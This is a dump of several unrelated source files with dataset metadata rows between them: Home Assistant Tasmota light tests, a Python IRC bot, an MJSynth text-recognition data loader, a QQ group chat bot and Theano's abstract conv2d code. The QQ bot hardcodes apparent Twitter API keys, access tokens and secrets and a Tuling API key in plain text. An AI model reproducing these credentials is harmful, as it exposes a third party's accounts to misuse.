await _test_unlinked_light(hass, mqtt_mock, config, 0)
async def test_unlinked_light2(hass, mqtt_mock, setup_tasmota):
"""Test rgbww light split to rgb+ww."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 1
config["rl"][1] = 1
config["rl"][2] = 2
config["rl"][3] = 2
config["lk"] = 0 # RGB + white channels unlinked
config["lt_st"] = 5 # 5 channel light (RGBCW)
await _test_unlinked_light(hass, mqtt_mock, config, 2)
async def test_discovery_update_reconfigure_light(
hass, mqtt_mock, caplog, setup_tasmota
):
"""Test reconfigure of discovered light."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
config2 = copy.deepcopy(DEFAULT_CONFIG)
config2["rl"][0] = 2
config2["lt_st"] = 3 # 3 channel light (RGB)
data1 = json.dumps(config)
data2 = json.dumps(config2)
# Simple dimmer
async_fire_mqtt_message(hass, f"{DEFAULT_PREFIX}/{config[CONF_MAC]}/config", data1)
await hass.async_block_till_done()
state = hass.states.get("light.test")
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION
)
# Reconfigure as RGB light
async_fire_mqtt_message(hass, f"{DEFAULT_PREFIX}/{config[CONF_MAC]}/config", data2)
await hass.async_block_till_done()
state = hass.states.get("light.test")
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS | SUPPORT_COLOR | SUPPORT_EFFECT | SUPPORT_TRANSITION
)
async def test_availability_when_connection_lost(
hass, mqtt_client_mock, mqtt_mock, setup_tasmota
):
"""Test availability after MQTT disconnection."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
await help_test_availability_when_connection_lost(
hass, mqtt_client_mock, mqtt_mock, light.DOMAIN, config
)
async def test_availability(hass, mqtt_mock, setup_tasmota):
"""Test availability."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
await help_test_availability(hass, mqtt_mock, light.DOMAIN, config)
async def test_availability_discovery_update(hass, mqtt_mock, setup_tasmota):
"""Test availability discovery update."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
await help_test_availability_discovery_update(hass, mqtt_mock, light.DOMAIN, config)
async def test_availability_poll_state(
hass, mqtt_client_mock, mqtt_mock, setup_tasmota
):
"""Test polling after MQTT connection (re)established."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
poll_topic = "tasmota_49A3BC/cmnd/STATE"
await help_test_availability_poll_state(
hass, mqtt_client_mock, mqtt_mock, light.DOMAIN, config, poll_topic, ""
)
async def test_discovery_removal_light(hass, mqtt_mock, caplog, setup_tasmota):
"""Test removal of discovered light."""
config1 = copy.deepcopy(DEFAULT_CONFIG)
config1["rl"][0] = 2
config1["lt_st"] = 1 # 1 channel light (Dimmer)
config2 = copy.deepcopy(DEFAULT_CONFIG)
config2["rl"][0] = 0
config2["lt_st"] = 0
await help_test_discovery_removal(
hass, mqtt_mock, caplog, light.DOMAIN, config1, config2
)
async def test_discovery_removal_relay_as_light(hass, mqtt_mock, caplog, setup_tasmota):
"""Test removal of discovered relay as light."""
config1 = copy.deepcopy(DEFAULT_CONFIG)
config1["rl"][0] = 1
config1["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light
config2 = copy.deepcopy(DEFAULT_CONFIG)
config2["rl"][0] = 1
config2["so"]["30"] = 0 # Disable Home Assistant auto-discovery as light
await help_test_discovery_removal(
hass, mqtt_mock, caplog, light.DOMAIN, config1, config2
)
async def test_discovery_removal_relay_as_light2(
hass, mqtt_mock, caplog, setup_tasmota
):
"""Test removal of discovered relay as light."""
config1 = copy.deepcopy(DEFAULT_CONFIG)
config1["rl"][0] = 1
config1["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light
config2 = copy.deepcopy(DEFAULT_CONFIG)
config2["rl"][0] = 0
config2["so"]["30"] = 0 # Disable Home Assistant auto-discovery as light
await help_test_discovery_removal(
hass, mqtt_mock, caplog, light.DOMAIN, config1, config2
)
async def test_discovery_update_unchanged_light(hass, mqtt_mock, caplog, setup_tasmota):
"""Test update of discovered light."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
with patch(
"homeassistant.components.tasmota.light.TasmotaLight.discovery_update"
) as discovery_update:
await help_test_discovery_update_unchanged(
hass, mqtt_mock, caplog, light.DOMAIN, config, discovery_update
)
async def test_discovery_device_remove(hass, mqtt_mock, setup_tasmota):
"""Test device registry remove."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
unique_id = f"{DEFAULT_CONFIG['mac']}_light_light_0"
await help_test_discovery_device_remove(
hass, mqtt_mock, light.DOMAIN, unique_id, config
)
async def test_discovery_device_remove_relay_as_light(hass, mqtt_mock, setup_tasmota):
"""Test device registry remove."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 1
config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light
unique_id = f"{DEFAULT_CONFIG['mac']}_light_relay_0"
await help_test_discovery_device_remove(
hass, mqtt_mock, light.DOMAIN, unique_id, config
)
async def test_entity_id_update_subscriptions(hass, mqtt_mock, setup_tasmota):
"""Test MQTT subscriptions are managed when entity_id is updated."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
topics = [
get_topic_stat_result(config),
get_topic_tele_state(config),
get_topic_tele_will(config),
]
await help_test_entity_id_update_subscriptions(
hass, mqtt_mock, light.DOMAIN, config, topics
)
async def test_entity_id_update_discovery_update(hass, mqtt_mock, setup_tasmota):
"""Test MQTT discovery update when entity_id is updated."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
await help_test_entity_id_update_discovery_update(
hass, mqtt_mock, light.DOMAIN, config
)
| apache-2.0 | 7,148,501,709,029,894,000 | 33.178399 | 88 | 0.642186 | false | 3.285714 | true | false | false |
asghaier/pynorcio | pynorcio.py | 1 | 2508 | #!/usr/bin/python
import sys
import socket
import string
import datetime
import config as config
class Pynorcio:
readbuffer = ""
s = ""
conf = ""
def __init__(self):
self.conf = config.Config()
self.connect()
def connect(self):
self.s = socket.socket()
self.s.connect((self.conf.HOST, self.conf.PORT))
self.s.send("NICK %s\r\n" % self.conf.NICK)
self.s.send("USER %s %s bla :%s\r\n" % (self.conf.IDENT, self.conf.HOST, self.conf.REALNAME))
for channel in self.conf.CHANNELS:
self.s.send("JOIN " + channel + "\r\n")
while 1:
self.readbuffer = self.readbuffer + self.s.recv(1024)
temp = string.split(self.readbuffer, "\n")
self.readbuffer = temp.pop( )
for line in temp:
msg = line
line = string.rstrip(line)
line = string.split(line)
if (line[0] == "PING"):
self.s.send("PONG %s\r\n" % line[1])
elif ( (line[1] == "PRIVMSG") and line[3].startswith(":" + self.conf.NICK) ):
self.read(line, msg)
def read(self, line, msg):
sndr = line[0][1:line[0].find("!")]
rcvr = line[2]
rply = ""
cmd = line[4]
to = ""
if (rcvr.startswith("#")):
to = rcvr
else:
to = sndr
if (cmd == "ping"):
self.write(to, self.query(line, msg))
elif (cmd == "whois"):
self.write(to, self.query(line, msg))
elif (cmd == "help"):
self.write(to, self.query(line, msg))
elif (cmd == "time"):
self.write(to, self.query(line, msg))
def write(self, to, output):
for line in output:
self.s.send("PRIVMSG " + to + " :" + line + "\r\n")
return ""
def query(self, line, msg):
sndr = line[0][1:line[0].find("!")]
rcvr = line[2]
cmd = line[4]
msg = msg[string.find(msg, ":", 1)+1:]
rply = []
eof = "\r\n"
if (cmd == "ping"):
return ["pong"]
elif (cmd == "whois"):
return ["My name is " + self.conf.REALNAME + ", and I am a python IRC bot."]
elif (cmd == "help"):
return [self.conf.NICK + " help command (commands : ping, whois)"]
elif (cmd == "time"):
return [datetime.datetime.now().time().isoformat()]
if __name__ == '__main__':
bot = Pynorcio()
| gpl-3.0 | 6,023,239,255,092,199,000 | 30.746835 | 101 | 0.480861 | false | 3.366443 | false | false | false |
mathDR/reading-text-in-the-wild | CHAR2/mjsynth_charnet.py | 1 | 4056 | # coding=utf-8
## Modified from https://github.com/tommasolevato/CNN-Classification/blob/master/mjsynth.py
from os.path import isfile
import logging
import numpy as np
import os.path
import matplotlib.image as mpimg
from skimage.transform import resize
np.random.seed(1)
class MJSYNTH_CHARNET():
classes = []
def __init__(self, which_set, numExamples):
self.output_char = [x for x in '0123456789abcdefghijklmnopqrstuvwxyz ']
self.space_hot = [0]*37
self.space_hot[-1] = 1
self.one_hot = [0]*37
self.height = 32
self.width = 100
self.examples = []
self.img_shape = (1, self.height, self.width)
self.numExamples = numExamples
self.which_set = which_set
if which_set == "train":
self.fileToLoadFrom = "annotation_train.txt"
elif which_set == "test":
self.fileToLoadFrom = "annotation_test.txt"
elif which_set == "valid":
self.fileToLoadFrom = "annotation_val.txt"
else:
raise ValueError("Set not recognized")
self.datapath = 'LOCATION OF SYNTH 90kDICT32px/ FOLDER'
self.loadData()
def findExamples(self):
with open(self.datapath + self.fileToLoadFrom) as f:
for line in f:
exampleClass = line.split(" ")[1].rstrip()
file = line.split(" ")[0].rstrip()
try:
self.examples.append(file[2:len(file)])
if len(self.examples) == self.numExamples:
break
except KeyError:
pass
def findOtherExamplesIfNeeded(self):
if len(self.examples) < self.numExamples:
with open(self.datapath + self.fileToLoadFrom) as f:
for line in f:
file = line.split(" ")[0].rstrip()
if file not in self.examples:
self.examples.append(file[2:len(file)])
if len(self.examples) == self.numExamples:
break
assert len(self.examples) == self.numExamples
def loadData(self):
self.findExamples()
self.findOtherExamplesIfNeeded()
self.loadImages()
def loadImages(self):
self.x = np.zeros((len(self.examples), 1, self.height, self.width), dtype=np.float32)
i = 0
tmp = []
for example in self.examples:
filename = self.datapath + example
self.x[i, :, :, :] = self.loadImage(filename)
classLabel = self.loadClassLabel(filename)
tmp.append(classLabel)
i += 1
self.labels = np.array(tmp)
def loadImage(self, filename):
if not isfile(filename):
print filename + "does not exist"
else:
img = mpimg.imread(filename)
if len(img.shape) == 3 and img.shape[2] == 3:
img = np.dot(img[...,:3], [0.2989, 0.5870, 0.1140]) # Convert to greyscale
im = resize(img, (32,100), order=1, preserve_range=True)
im = np.array(im,dtype=np.float32) # convert to single precision
img = (im - np.mean(im)) / ( (np.std(im) + 0.0001) )
return img
def loadClassLabel(self, filename):
word = (filename.split("_")[1]).lower()
#convert the word in the filename to a one-hot vector of length 37*23
classLabel = []
for i,c in enumerate(word):
ind = self.output_char.index(c)
tmp_hot = self.one_hot[:]
tmp_hot[ind] = 1
classLabel.extend(tmp_hot)
classLabel.extend((23-(i+1))*self.space_hot)
return classLabel
if __name__ == '__main__':
z = MJSYNTH_CHARNET("train",10)
output_char = [x for x in '0123456789abcdefghijklmnopqrstuvwxyz ']
for j in range(len(z.labels)):
y = z.labels[j]
for i in range(23):
c = np.where(y[i*37:(i+1)*37]==1)[0][0]
print output_char[c],
print ''
| gpl-3.0 | 2,037,932,847,618,101,800 | 34.269565 | 93 | 0.548077 | false | 3.773023 | false | false | false |
numerology/QQbot | main.py | 1 | 13776 | # -*- coding: utf-8 -*-
__author__ = 'Nilk'
from qqbot import QQBotSlot as qqbotslot, RunBot
import csv
import tweepy
import datetime
import os
import json
import urllib2
import sys
import re as regex
import time
import logging
from bs4 import BeautifulSoup as BS
reload(sys)
sys.setdefaultencoding('utf-8')
CONSUMER_KEY = 'uWb94m6mwDnHOix6YAfMQ1ESt'
CONSUMER_SECRET = 'AHOrZYDUvskktLFIQRvXxnN7hDxtkaW8PZQsg1AatQfNGvbczQ'
ACCESS_TOKEN = '1936186141-P1P8jBW8gwcLVMOW3kzeSOoF8GXvkyCPYvq4uB9'
ACCESS_TOKEN_SECRET = 'aLyYUHTYXkS4VHdI8Wvf49ydOOWYjMldGrMeFSMukeWuU'
TULINGKEY = "0a3727130d754c8d95797977f8f61646"
TULINGURL = "http://www.tuling123.com/openapi/api?"
TIME_ONEDAY = datetime.timedelta(1)
KCWIKI_DATA = "http://kcwikizh.github.io/kcdata/slotitem/poi_improve.json"
GROUP_NUMBER = '337545621'
with open('responses.csv', mode = 'r') as infile:
reader = csv.reader(infile)
responses = {rows[0]:rows[1] for rows in reader}
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
repCounter = 0
prevMsg = ''
logger = logging.getLogger('shoukaku')
hdlr = logging.FileHandler('shoukaku.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.INFO)
def tail( f, lines=20 ):
total_lines_wanted = lines
BLOCK_SIZE = 1024
f.seek(0, 2)
block_end_byte = f.tell()
lines_to_go = total_lines_wanted
block_number = -1
blocks = [] # blocks of size BLOCK_SIZE, in reverse order starting
# from the end of the file
while lines_to_go > 0 and block_end_byte > 0:
if (block_end_byte - BLOCK_SIZE > 0):
# read the last block we haven't yet read
f.seek(block_number*BLOCK_SIZE, 2)
blocks.append(f.read(BLOCK_SIZE))
else:
# file too small, start from begining
f.seek(0,0)
# only read what was not read
blocks.append(f.read(block_end_byte))
lines_found = blocks[-1].count('\n')
lines_to_go -= lines_found
block_end_byte -= BLOCK_SIZE
block_number -= 1
all_read_text = ''.join(reversed(blocks))
return '\n'.join(all_read_text.splitlines()[-total_lines_wanted:])
@qqbotslot
def onQQMessage(bot, contact, member, content):
global api
global logger
logger.info(content)
print(contact.qq)
if (contact.qq == '1259276249'):
# content = {'userid':'123456', 'info':content, 'key':TULINGKEY}
# data = json.dumps(content)
# req = urllib2.Request(TULINGURL, data, {'Content-Type': 'application'})
# re = urllib2.urlopen(req)
# re = re.read()
# re_dict = json.loads(re)
# text = re_dict['text']
# bot.SendTo(contact, str(text.encode('utf-8', 'ignore')))
if (content == '-stop'):
bot.SendTo(contact, 'QQ Bot terminated')
bot.Stop()
if (content == '-log output'):
log_file = open('shoukaku.log')
bot.SendTo(contact, tail(log_file, lines = 30))
if('@正规空母翔鹤' in content):
for key, value in responses.iteritems():
print(key)
if key in content:
bot.SendTo(contact, value)
break
return
if('抓取官推' in content):
time_now = datetime.datetime.now()
public_tweets = api.user_timeline('fgoproject')
for tweet in public_tweets:
if(time_now - tweet.created_at < TIME_ONEDAY):
time.sleep(1)
bot.SendTo(contact, str(tweet.text.encode('utf-8', 'ignore')))
return
if('改修' in content):
total_string = ''
print('checking for akashi factory list')
req = urllib2.Request(KCWIKI_DATA)
re = urllib2.urlopen(req)
re = re.read()
equip_list = json.loads(re)
today_week = datetime.datetime.now() + datetime.timedelta(hours = 14)
today_week = (today_week.weekday() + 1) % 7
for equip in equip_list:
list_of_secretary = []
improvements = equip[u'improvement']
#note: one equip can have different combination of secretary and weekdays,
#also different improvement paths
for current_improvement in improvements:
current_requirements = current_improvement[u'req']
for requirement in current_requirements:
days = requirement[u'day']
if(days[today_week]):
#add secretaries to the list
list_of_secretary.extend(requirement[u'secretary'])
if(len(list_of_secretary) > 0):
info = '装备名称: '.encode('utf-8') + equip['name'] + ' 秘书舰: '.encode('utf-8')
for secretary in list_of_secretary:
info = info + secretary + ' '
total_string = total_string + ';' + info
bot.SendTo(contact, total_string)
return
#testgroup '209127315' target 337545621
if (contact.qq == GROUP_NUMBER and '@ME' in content): #info mode
#check the info list
for key, value in responses.iteritems():
if key in content:
bot.SendTo(contact, value)
return
if('攻略' in content or '配置' in content or '带路' in content):
#turn to kcwiki pages
area = ''
if('1-' in content):
area = urllib2.quote('镇守府海域')
if('2-' in content):
area = urllib2.quote('南西群岛海域')
if('3-' in content):
area = urllib2.quote('北方海域')
if('4-' in content):
area = urllib2.quote('西方海域')
if('5-' in content):
area = urllib2.quote('南方海域')
if('6-' in content):
area = urllib2.quote('中部海域')
pattern = regex.compile(r'\d-\d')
subarea = regex.search(pattern, content).group()
print(subarea)
html_content = urllib2.urlopen('https://zh.kcwiki.org/wiki/' + area + '/' + subarea).read()
soup = BS(html_content)
print(soup.title)
flag = False
pattern = regex.compile(r'</?\w+[^>]*>|<br\s*?/?>|\n+')
for item in soup.find_all('div'):
if(flag and item.ul is not None):
for entry in item.ul:
time.sleep(1)
bot.SendTo(contact, str(pattern.sub('',str(entry))).encode('utf-8'))
break
if(item.b is not None and '海域情报' in str(item.b)):
print(item.get('class'))
flag = True
return
if('FGO' in content and '情报' in content):
time_now = datetime.datetime.now()
public_tweets = api.user_timeline('fgoproject')
for tweet in public_tweets:
if(time_now - tweet.created_at < TIME_ONEDAY):
time.sleep(1)
bot.SendTo(contact, str(tweet.text.encode('utf-8', 'ignore')))
return
if('舰' in content and '情报' in content):
time_now = datetime.datetime.now()
public_tweets = api.user_timeline('KanColle_STAFF')
for tweet in public_tweets:
if(time_now - tweet.created_at < TIME_ONEDAY):
time.sleep(1)
bot.SendTo(contact, str(tweet.text.encode('utf-8', 'ignore')))
return
#氪金信息
if('充值' in content or '氪金' in content):
print('check for current price')
bot.SendTo(contact, 'FGO黑卡充值:'.encode('utf-8') + 'https://item.taobao.com/item.htm?spm=0.0.0.0.nBUIej&id=546772277736')
bot.SendTo(contact, 'FGO白卡充值:'.encode('utf-8') + 'https://item.taobao.com/item.htm?spm=a1z0k.7628870.0.0.kayXcs&id=545942439642&_u=p2o03db0b500')
bot.SendTo(contact, '舰娘氪金:'.encode('utf-8') + 'https://item.taobao.com/item.htm?spm=a1z10.5-c.w4002-15864276650.23.yejdE6&id=539141881167')
return
#if no keywords matched, turn to tuling123 api
#the response categories: 100000 = text, 200000 = url, 302000 = news(return type is perhaps a list)
if('改修' in content):
total_string = ''
print('checking for akashi factory list')
req = urllib2.Request(KCWIKI_DATA)
re = urllib2.urlopen(req)
re = re.read()
equip_list = json.loads(re)
today_week = datetime.datetime.now() + datetime.timedelta(hours = 14)
today_week = (today_week.weekday() + 1) % 7
for equip in equip_list:
list_of_secretary = []
improvements = equip[u'improvement']
#note: one equip can have different combination of secretary and weekdays,
#also different improvement paths
for current_improvement in improvements:
current_requirements = current_improvement[u'req']
for requirement in current_requirements:
days = requirement[u'day']
if(days[today_week]):
#add secretaries to the list
list_of_secretary.extend(requirement[u'secretary'])
if(len(list_of_secretary) > 0):
info = '装备名称: '.encode('utf-8') + equip['name'] + ' 秘书舰: '.encode('utf-8')
for secretary in list_of_secretary:
info = info + secretary + ' '
total_string = total_string + ';' + info
bot.SendTo(contact, total_string)
return
pure_content = content.decode('utf8')[6:].encode('utf8')
print('pure_content = ' + pure_content.encode('gb2312'))
content = {'userid':member.uin, 'info':pure_content, 'key':TULINGKEY}
data = json.dumps(content)
req = urllib2.Request(TULINGURL, data, {'Content-Type': 'application'})
re = urllib2.urlopen(req)
re = re.read()
re_dict = json.loads(re)
category = re_dict['code']
print(category)
if(category == 100000):
text = re_dict['text']
bot.SendTo(contact, str(text.encode('utf-8')))
elif(category == 200000):
text = re_dict['text']
bot.SendTo(contact, str(text.encode('utf-8')))
link = re_dict['url']
bot.SendTo(contact, str(link.encode('utf-8')))
elif(category == 308000): #the return type is a list
text = re_dict['text']
bot.SendTo(contact, str(text.encode('utf-8')))
return_list = re_dict['list']
print(len(return_list))
counter = 0
for item in return_list:
time.sleep(1)
bot.SendTo(contact, item['name'].encode('utf-8') + '用料: '.encode('utf-8')
+ item['info'].encode('utf-8') + ' 详细做法: '.encode('utf-8') + item['detailurl'].encode('utf-8'))
counter+=1
if(counter > 2):
break
elif(category == 302000):
text = re_dict['text']
bot.SendTo(contact, str(text.encode('utf-8')))
return_list = re_dict['list']
print(len(return_list))
counter = 0
for item in return_list:
time.sleep(1)
bot.SendTo(contact, item['article'].encode('utf-8') + ' 消息来自: '.encode('utf-8')
+ item['source'].encode('utf-8') + ' 详情请见: '.encode('utf-8') + item['detailurl'].encode('utf-8'))
counter+=1
if(counter > 2):
break
else:
#trolling in chat
#1. 复读
# repeatition should be such that, once it has participated in a row, it should not say anything anymore
global repCounter
global prevMsg
curMsg = content
if(repCounter == 0):
repCounter += 1
else:
if(curMsg == prevMsg):
repCounter += 1
print(repCounter)
else:
if(repCounter > 3):
bot.SendTo(contact, '你们的复读坚持了' + str(repCounter + 1) + '次~人类的本质就是个复读机!')
repCounter = 0
if(repCounter == 3):
bot.SendTo(contact, content)
prevMsg = curMsg
@qqbotslot
def onInterval(bot):
test_group = bot.List('group', '337545621')[0]
# bot.SendTo(test_group, 'interval method evoked')
#execute per 5mins
#sending debug info
time_now = datetime.datetime.time(datetime.datetime.now())
if(time_now >= datetime.time(0,50,0,0) and time_now < datetime.time(0,55,0,0)):
bot.SendTo(test_group, 'Kancolle 演习马上更新, 请各位提督不要忘记演习~'.encode('utf-8'))
if(time_now >= datetime.time(12,50,0,0) and time_now < datetime.time(12,55,0,0)):
bot.SendTo(test_group, 'Kancolle 演习马上更新, 请各位提督不要忘记演习~'.encode('utf-8'))
if(time_now >= datetime.time(6,50,0,0) and time_now < datetime.time(6,55,0,0)):
public_tweets = api.user_timeline('fgoproject')
for tweet in public_tweets:
if(datetime.datetime.now() - tweet.created_at < TIME_ONEDAY):
bot.SendTo(test_group, str(tweet.text.encode('utf-8', 'ignore')))
public_tweets = api.user_timeline('KanColle_STAFF')
for tweet in public_tweets:
if(time_now - tweet.created_at < TIME_ONEDAY):
bot.SendTo(test_group, str(tweet.text.encode('utf-8', 'ignore')))
if(time_now >= datetime.time(10,0,0,0) and time_now < datetime.time(10,5,0,0)):
bot.SendTo(test_group, 'FGO日常任务以及免费友情点十连已经更新~'.encode('utf-8'))
if(time_now >= datetime.time(14,0,0,0) and time_now < datetime.time(14,5,0,0)):
bot.SendTo(test_group, 'FGO日常登录奖励大家不要错过哦~'.encode('utf-8'))
if(time_now >= datetime.time(15,0,0,0) and time_now < datetime.time(15,5,0,0)):
bot.SendTo(test_group, 'Kancolle每日任务已经更新~'.encode('utf-8'))
#some time point,
#1am, kancolle drill
#6am, check latest info
#10am, FGO free summoning, daily quest update
#1pm, kancolle drill
#2pm, FGO login award
#3pm, kancolle quest update
@qqbotslot
def onNewContact(bot, contact, owner):
#exec when there is new member joining owner
print('onNewContact evoked')
if(owner is None): return
if(owner.qq == GROUP_NUMBER):
test_group = bot.List('group', GROUP_NUMBER)[0]
new_member = bot.List(test_group, 'qq='+str(contact.qq))[0]
bot.SendTo(owner, '欢迎新dalao~'.encode('utf-8'))
bot.SendTo(owner, 'Hello '.encode('utf-8')+ contact.card.encode('utf-8')+'. 我是翔鹤,有什么问题可以at我,如果对于我的功能有什么建议的话请找nilk.'
.encode('utf-8'))
#open the info table
RunBot(qq='3407757156', user = 'Nilk')
'''
Goal:
1. Nilk will be the only authorized person who has the ability to edit the response of it.
2. Can troll in the group chat
3. When called out by @, provide proper info
'''
'''
TODO:
0. try to trim the @me before msg in group chat(done)
1.点歌,发url
3.氪金信息
4.crawl for info, instead of hard coded csv(done)
5.今日改修,今日修炼场,今日种火
6.定时提醒清本,上线清任务领奖励(done)
7.带33节奏
舰娘信息可以用kcwiki api
'''
| gpl-3.0 | 2,575,763,928,472,989,000 | 30.479714 | 148 | 0.65815 | false | 2.562658 | true | false | false |
cmdunkers/DeeperMind | PythonEnv/lib/python2.7/site-packages/theano/tensor/nnet/abstract_conv2d.py | 1 | 21815 | """
Define abstract conv2d interface
"""
import logging
import theano
from theano.tensor import (as_tensor_variable, patternbroadcast)
from theano.tensor import TensorType
from theano.gof import Apply, Op
from theano.gof import local_optimizer
from theano.tensor.opt import register_specialize_device
# Cpu implementation
from theano.tensor.nnet import conv2d as cpu_conv2d, ConvOp
from theano.tensor.nnet.ConvGrad3D import convGrad3D
from theano.tensor.nnet.ConvTransp3D import convTransp3D
__docformat__ = "restructuredtext en"
_logger = logging.getLogger("theano.tensor.nnet.conv2d")
def conv2d(input,
filters,
input_shape=None,
filter_shape=None,
border_mode='valid',
subsample=(1, 1),
filter_flip=True):
"""
This function will build the symbolic graph for convolving a mini-batch of a
stack of 2D inputs with a set of 2D filters. The implementation is modelled
after Convolutional Neural Networks (CNN).
:type input: symbolic 4D tensor
:param input: mini-batch of feature map stacks, of shape
(batch size, input channels, input rows, input columns).
See the optional parameter ``input_shape``.
:type filters: symbolic 4D tensor
:param filters: set of filters used in CNN layer of shape
(output channels, input channels, filter rows, filter columns).
See the optional parameter ``filter_shape``.
:type input_shape: None, tuple/list of len 4 of int or Constant variable
:param input_shape: The shape of the input parameter.
Optional, possibly used to choose an optimal implementation.
You can give ``None`` for any element of the list to specify that this
element is not known at compile time.
:type filter_shape: None, tuple/list of len 4 of int or Constant variable
:param filter_shape: The shape of the filters parameter.
Optional, possibly used to choose an optimal implementation.
You can give ``None`` for any element of the list to specify that this
element is not known at compile time.
:type border_mode: str, int or tuple of two int
:param border_mode: Either of the following:
* ``'valid'``: apply filter wherever it completely overlaps with the
input. Generates output of shape: input shape - filter shape + 1
* ``'full'``: apply filter wherever it partly overlaps with the input.
Generates output of shape: input shape + filter shape - 1
* ``'half'``: pad input with a symmetric border of ``filter rows // 2``
rows and ``filter columns // 2`` columns, then perform a valid
convolution. For filters with an odd number of rows and columns, this
leads to the output shape being equal to the input shape.
* ``int``: pad input with a symmetric border of zeros of the given
width, then perform a valid convolution.
* ``(int1, int2)``: pad input with a symmetric border of ``int1`` rows
and ``int2`` columns, then perform a valid convolution.
:type subsample: tuple of len 2
:param subsample: factor by which to subsample the output.
Also called strides elsewhere.
:type filter_flip: bool
:param filter_flip: If ``True``, will flip the filter rows and columns
before sliding them over the input. This operation is normally referred
to as a convolution, and this is the default. If ``False``, the filters
are not flipped and the operation is referred to as a cross-correlation.
:rtype: symbolic 4D tensor
:return: set of feature maps generated by convolutional layer. Tensor is
of shape (batch size, output channels, output rows, output columns)
"""
conv_op = AbstractConv2d(imshp=input_shape,
kshp=filter_shape,
border_mode=border_mode,
subsample=subsample,
filter_flip=filter_flip)
return conv_op(input, filters)
class BaseAbstractConv2d(Op):
"""
Base class for AbstractConv
Define an abstract convolution op that will be replaced with the appropriate implementation
:type imshp: None, tuple/list of len 4 of int or Constant variable
:param imshp: The shape of the input parameter.
Optional, possibly used to choose an optimal implementation.
You can give ``None`` for any element of the list to specify that this
element is not known at compile time.
imshp is defined w.r.t the forward conv.
:type kshp: None, tuple/list of len 4 of int or Constant variable
:param kshp: The shape of the filters parameter.
Optional, possibly used to choose an optimal implementation.
You can give ``None`` for any element of the list to specify that this
element is not known at compile time.
kshp is defined w.r.t the forward conv.
:type border_mode: str, int or tuple of two int
:param border_mode: Either of the following:
* ``'valid'``: apply filter wherever it completely overlaps with the
input. Generates output of shape: input shape - filter shape + 1
* ``'full'``: apply filter wherever it partly overlaps with the input.
Generates output of shape: input shape + filter shape - 1
* ``'half'``: pad input with a symmetric border of ``filter rows // 2``
rows and ``filter columns // 2`` columns, then perform a valid
convolution. For filters with an odd number of rows and columns, this
leads to the output shape being equal to the input shape.
* ``int``: pad input with a symmetric border of zeros of the given
width, then perform a valid convolution.
* ``(int1, int2)``: pad input with a symmetric border of ``int1`` rows
and ``int2`` columns, then perform a valid convolution.
:type subsample: tuple of len 2
:param subsample: factor by which to subsample the output.
Also called strides elsewhere.
:type filter_flip: bool
:param filter_flip: If ``True``, will flip the filter rows and columns
before sliding them over the input. This operation is normally referred
to as a convolution, and this is the default. If ``False``, the filters
are not flipped and the operation is referred to as a cross-correlation.
"""
check_broadcast = False
__props__ = ('border_mode', 'subsample', 'filter_flip', 'imshp', 'kshp')
def __init__(self,
imshp=None, kshp=None,
border_mode="valid", subsample=(1, 1),
filter_flip=True):
if isinstance(border_mode, int):
border_mode = (border_mode, border_mode)
if isinstance(border_mode, tuple):
pad_h, pad_w = map(int, border_mode)
border_mode = (pad_h, pad_w)
if not ((isinstance(border_mode, tuple) and min(border_mode) >= 0) or
border_mode in ('valid', 'full', 'half')):
raise ValueError(
'invalid border_mode {}, which must be either '
'"valid", "full", "half", an integer or a pair of'
' integers'.format(border_mode))
self.imshp = tuple(imshp) if imshp else None
self.kshp = tuple(kshp) if kshp else None
self.border_mode = border_mode
self.filter_flip = filter_flip
if len(subsample) != 2:
raise ValueError("subsample must have two elements")
self.subsample = subsample
def flops(self, inp, outp):
""" Useful with the hack in profilemode to print the MFlops"""
# if the output shape is correct, then this gives the correct
# flops for any direction, sampling, padding, and border mode
inputs, filters = inp
outputs, = outp
assert inputs[1] == filters[1]
# nb mul and add by output pixel
flops = filters[2] * filters[3] * 2
# nb flops by output image
flops *= outputs[2] * outputs[3]
# nb patch multiplied
flops *= inputs[1] * filters[0] * inputs[0]
return flops
class AbstractConv2d(BaseAbstractConv2d):
"""
Abstract Op for the forward convolution.
"""
def __init__(self,
imshp=None,
kshp=None,
border_mode="valid",
subsample=(1, 1),
filter_flip=True):
super(AbstractConv2d, self).__init__(imshp, kshp,
border_mode, subsample, filter_flip)
def make_node(self, img, kern):
if img.type.ndim != 4:
raise TypeError('img must be 4D tensor')
if kern.type.ndim != 4:
raise TypeError('kern must be 4D tensor')
broadcastable = [img.broadcastable[0],
kern.broadcastable[0],
False, False]
output = img.type.clone(broadcastable=broadcastable)()
return Apply(self, [img, kern], [output])
def perform(self, node, inp, out_):
raise NotImplementedError('AbstractConv2d theano optimization failed')
def grad(self, inp, grads):
bottom, weights = inp
top, = grads
